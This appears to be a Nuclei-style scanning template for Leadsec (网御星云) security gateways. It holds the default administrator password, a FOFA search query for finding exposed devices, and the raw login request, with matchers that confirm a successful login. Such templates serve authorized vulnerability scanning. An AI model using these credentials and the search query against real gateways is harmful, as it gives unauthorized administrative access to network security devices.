id: leadsec-gateway-default-login
info:
  name: 网御星云安全网关弱口令
  author: leadlife
  severity: high
  description: 
  reference: 
    - demo
  classification:
    cve-id: 
  metadata:
    verified: true
    fofa-query: title="网御 安全网关"
    tips:
    repair:
    version:
  tags: leadsec,default-login

http:
  - raw:
      - |
        POST /cgi-bin/webui?op=pcm_login HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2459.5 Safari/537.36
        Content-Type: application/x-www-form-urlencoded
        Content-Length: [计算的内容长度]
        Connection: keep-alive  # 因session=true，需保持连接以传递会话标识（如Cookie）

        txt_name=administrator&txt_password=leadsec@7766
        
    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains_all(body,'window.location.href','administrator')
        condition: and